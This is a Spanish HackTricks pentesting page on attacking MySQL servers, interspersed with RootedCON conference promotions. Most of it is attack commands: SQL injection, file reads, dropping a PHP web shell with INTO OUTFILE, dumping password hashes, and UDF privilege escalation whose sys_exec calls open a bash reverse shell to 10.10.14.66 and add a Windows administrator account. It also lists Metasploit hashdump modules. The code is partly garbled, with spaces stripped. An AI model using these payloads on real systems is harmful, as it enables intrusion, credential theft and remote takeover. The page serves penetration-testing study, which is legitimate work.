RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro clave para profesionales de tecnología y ciberseguridad en todas las disciplinas.
MySQL se puede describir como un Sistema de Gestión de Bases de Datos Relacional (RDBMS) de código abierto que está disponible de forma gratuita. Opera en el Lenguaje de Consulta Estructurado (SQL), permitiendo la gestión y manipulación de bases de datos.
Puerto predeterminado: 3306
3306/tcp open mysql
Conectar
Local
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;select version(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
Enumeración de Permisos de MySQL
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Lectura arbitraria de archivos en MySQL por el cliente
En realidad, cuando intentas cargar datos locales en una tabla el contenido de un archivo el servidor MySQL o MariaDB pide al cliente que lo lea y envíe el contenido. Entonces, si puedes manipular un cliente de mysql para que se conecte a tu propio servidor MySQL, puedes leer archivos arbitrarios.
Por favor, ten en cuenta que este es el comportamiento utilizando:
(Nota la palabra "local")
Porque sin la palabra "local" puedes obtener:
mysql>loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro clave para profesionales de la tecnología y ciberseguridad en todas las disciplinas.
En la configuración de los servicios de MySQL, se emplean varias configuraciones para definir su funcionamiento y medidas de seguridad:
La configuración user se utiliza para designar el usuario bajo el cual se ejecutará el servicio de MySQL.
password se aplica para establecer la contraseña asociada con el usuario de MySQL.
admin_address especifica la dirección IP que escucha las conexiones TCP/IP en la interfaz de red administrativa.
La variable debug indica las configuraciones de depuración actuales, incluyendo información sensible dentro de los registros.
sql_warnings gestiona si se generan cadenas de información para declaraciones de inserción de una sola fila cuando surgen advertencias, conteniendo datos sensibles dentro de los registros.
Con secure_file_priv, se restringe el alcance de las operaciones de importación y exportación de datos para mejorar la seguridad.
Escalada de privilegios
# Get current user (an all users) privileges and hashesusemysql;select user();select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Escalada de privilegios a través de una biblioteca
Si el servidor mysql se está ejecutando como root (u otro usuario con más privilegios) puedes hacer que ejecute comandos. Para ello, necesitas usar funciones definidas por el usuario. Y para crear una definida por el usuario, necesitarás una biblioteca para el sistema operativo en el que se esté ejecutando mysql.
La biblioteca maliciosa a utilizar se puede encontrar dentro de sqlmap y dentro de metasploit haciendo locate "*lib_mysqludf_sys*". Los archivos .so son bibliotecas de Linux y los .dll son los de Windows, elige el que necesites.
Si no tienes esas bibliotecas, puedes buscarlas, o descargar este código C de Linux y compilarlo dentro de la máquina vulnerable de Linux:
Ahora que tienes la biblioteca, inicia sesión en Mysql como usuario privilegiado (¿root?) y sigue los siguientes pasos:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Extrayendo credenciales de MySQL de archivos
Dentro de /etc/mysql/debian.cnf puedes encontrar la contraseña en texto plano del usuario debian-sys-maint
cat/etc/mysql/debian.cnf
Puedes utilizar estas credenciales para iniciar sesión en la base de datos mysql.
Dentro del archivo: /var/lib/mysql/mysql/user.MYD puedes encontrar todos los hashes de los usuarios de MySQL (los que puedes extraer de mysql.user dentro de la base de datos).
schema_table_statistics\schema_table_statistics_with_buffer\schema_tables_with_full_table_scans\schema_unused_indexes\session\session_ssl_status\statement_analysis\statements_with_errors_or_warnings\statements_with_full_table_scans\statements_with_runtimes_in_95th_percentile\statements_with_sorting\statements_with_temp_tables\sys_config\user_summary\user_summary_by_file_io\user_summary_by_file_io_type\user_summary_by_stages\user_summary_by_statement_latency\user_summary_by_statement_type\version\wait_classes_global_by_avg_latency\wait_classes_global_by_latency\waits_by_host_by_latency\waits_by_user_by_latency\waits_global_by_latency\x$host_summary\x$host_summary_by_file_io\x$host_summary_by_file_io_type\x$host_summary_by_stages\x$host_summary_by_statement_latency\x$host_summary_by_statement_type\x$innodb_buffer_stats_by_schema\x$innodb_buffer_stats_by_table\x$innodb_lock_waits\x$io_by_thread_by_latency\x$io_global_by_file_by_bytes\x$io_global_by_file_by_latency\x$io_global_by_wait_by_bytes\x$io_global_by_wait_by_latency\x$latest_file_io\x$memory_by_host_by_current_bytes\x$memory_by_thread_by_current_bytes\x$memory_by_user_by_current_bytes\x$memory_global_by_current_bytes\x$memory_global_total\x$processlist\x$ps_digest_95th_percentile_by_avg_us\x$ps_digest_avg_latency_distribution\x$ps_schema_table_statistics_io\x$schema_flattened_keys\x$schema_index_statistics\x$schema_table_lock_waits\x$schema_table_statistics\x$schema_table_statistics_with_buffer\x$schema_tables_with_full_table_scans\x$session\x$statement_analysis\x$statements_with_errors_or_warnings\x$statements_with_full_table_scans\x$statements_with_runtimes_in_95th_percentile\x$statements_with_sorting\x$statements_with_temp_tables\x$user_summary\x$user_summary_by_file_io\x$user_summary_by_file_io_type\x$user_summary_by_stages\x$user_summary_by_statement_latency\x$user_summary_by_statement_type\x$wait_classes_global_by_avg_latency\x$wait_classes_global_by_latency\x$waits_by_host_by_latency\x$waits_by_user_by_latency\x$waits_global_by_latency</div></div>## Comandos Automáticos de HackTricks
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro clave para profesionales de la tecnología y ciberseguridad en todas las disciplinas.
